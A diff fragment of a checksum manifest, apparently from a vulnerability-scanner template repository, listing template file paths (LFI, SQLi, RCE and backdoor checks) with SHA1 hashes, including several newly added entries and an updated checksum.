http/vulnerabilities/other/bitrix-open-redirect.yaml:d07d85523c53212e00bca343aa56c45ae078136d 
@@ -6170,6 +6313,7 @@ http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:0845daaee668a666fd2 http/vulnerabilities/other/chamilo-lms-sqli.yaml:5fe0cff3f3f3c852fd14093b5659bc2719360c0e http/vulnerabilities/other/chamilo-lms-xss.yaml:4c83bd6add9efe5e05240bce3fd0f858d6ed19c3 http/vulnerabilities/other/ckan-dom-based-xss.yaml:b8b79109f77c1f61d4191f38c32814438d262623 +http/vulnerabilities/other/clodop-printer-lfi.yaml:fb9dd9be90813a7347752c35f6447881610b736a http/vulnerabilities/other/coldfusion-debug-xss.yaml:e95f8dac229f56be4ae422603ada8b5e586d7c94 http/vulnerabilities/other/commax-biometric-auth-bypass.yaml:f9ce7cefadd26aaaa56f381810439df363829593 http/vulnerabilities/other/commax-credentials-disclosure.yaml:0ca9da78f9254620e94a29e437c765ab79173a44 @@ -6189,6 +6333,7 @@ http/vulnerabilities/other/dotnetcms-sqli.yaml:af7f4950eaac888fa6bb40dc253f6c23f http/vulnerabilities/other/dss-download-fileread.yaml:fa2a70d76e4b6a402f135a3d5ad09404bd539e3f http/vulnerabilities/other/duomicms-sql-injection.yaml:9f839065f6dc2a1edfd4bf425dbf943f6a9ba670 http/vulnerabilities/other/dzzoffice-xss.yaml:7925b71b798fce655b43dfb18cf75246b5629cb6 +http/vulnerabilities/other/easyimage-downphp-lfi.yaml:8fabd3cd52bf007c918874a8e0c13e6e9499f96b http/vulnerabilities/other/ecshop-sqli.yaml:b4f5d54e8ada68281039d7f722e52ddf518a4c96 http/vulnerabilities/other/ecsimagingpacs-rce.yaml:0ae513b5158c949a41510c0ba7eeb6180f0bb8ce http/vulnerabilities/other/eibiz-lfi.yaml:47b6bb1e4f444de3eaac7dd2dccdae6cb74a5e4e 
@@ -6253,6 +6398,7 @@ http/vulnerabilities/other/keycloak-xss.yaml:d20e3322f3430593356ac31c1ba2b9a0d63 http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:4a0dda044e05cda0742d803bc497b69fa89a5f0c http/vulnerabilities/other/kingsoft-v8-file-read.yaml:aa0e37be669e21c2f3a608952a0bd1c94394632f http/vulnerabilities/other/kiwitcms-json-rpc.yaml:04ed57277189ff7f95571626e9980dd6b1cfadae +http/vulnerabilities/other/kodak-network-lfi.yaml:d88bb8fad85354c8f837531c3936efad0b377ff1 http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:d4cac1b72d69f601bdf6537be92a9304732eb322 http/vulnerabilities/other/laravel-filemanager-lfi.yaml:93c7a647675b6871fdd205791ba02386f3ffa2bb http/vulnerabilities/other/loancms-sqli.yaml:55fd04e78f84ba3657bbe9e2b1327d5cf68778f5 @@ -6324,6 +6470,9 @@ http/vulnerabilities/other/resin-inputfile-fileread.yaml:99d1e9dc54f4ee317305d67 http/vulnerabilities/other/resin-viewfile-lfr.yaml:7de92f9c19448bcd34a9989dd162fa46334dd6e7 http/vulnerabilities/other/rockmongo-xss.yaml:758b23dabf3dfe4171b30ae387f273b25dba466c http/vulnerabilities/other/rundeck-log4j.yaml:f8b3929499e90a61ebd33b1d38aaa59c437f1c76 +http/vulnerabilities/other/sangfor-cphp-rce.yaml:bd4c5d106f68364176aef77bc77e2d6717c5e590 +http/vulnerabilities/other/sangfor-download-lfi.yaml:59f5b86ddcae473249635ef557de06891505bd3b +http/vulnerabilities/other/sangfor-sysuser-conf.yaml:825d22cfe7e5c41f0f78bd236c775577e32300fc http/vulnerabilities/other/sap-redirect.yaml:47a5370349446eee54ad22c333d902cd82c73e30 http/vulnerabilities/other/sar2html-rce.yaml:f1760b0bcbdfd892a53c31fadee6d698b6503c0f http/vulnerabilities/other/seacms-rce.yaml:eaa2ae8e9b835a93b7a091a91f083e519ed4603c 
@@ -6618,6 +6767,9 @@ http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:e7e8bf6bd2bc78efd9ceb6d04b5f0 http/vulnerabilities/zend/zend-v1-xss.yaml:625c68da0d08d6c8a1381704b3861de7b6ffad6f http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:d81ad79707b746a46d8dbf3825df18da17aba5bf http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b2cca06ab +http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:867377dd72eed091ea11ee05778c06855a5aef2b +http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:68c6f8ed4ebd17880e69cb75ff46e4594f9b1274 +http/vulnerabilities/zzzcms/zzzcms-xss.yaml:026425b2b85ab06c5db42d543763a9d6cfcc8794 network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f network/backdoor/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232 network/cves/2001/CVE-2001-1473.yaml:d7b8ad3248b716018e0c7ab5b39d65d442363af9 @@ -6757,7 +6909,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:59db62d00ce9a955d312bc64771f55a87581ec8e +templates-checksum.txt:6dc0677d1b832396c497d46ab8e0a827eb57d821 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f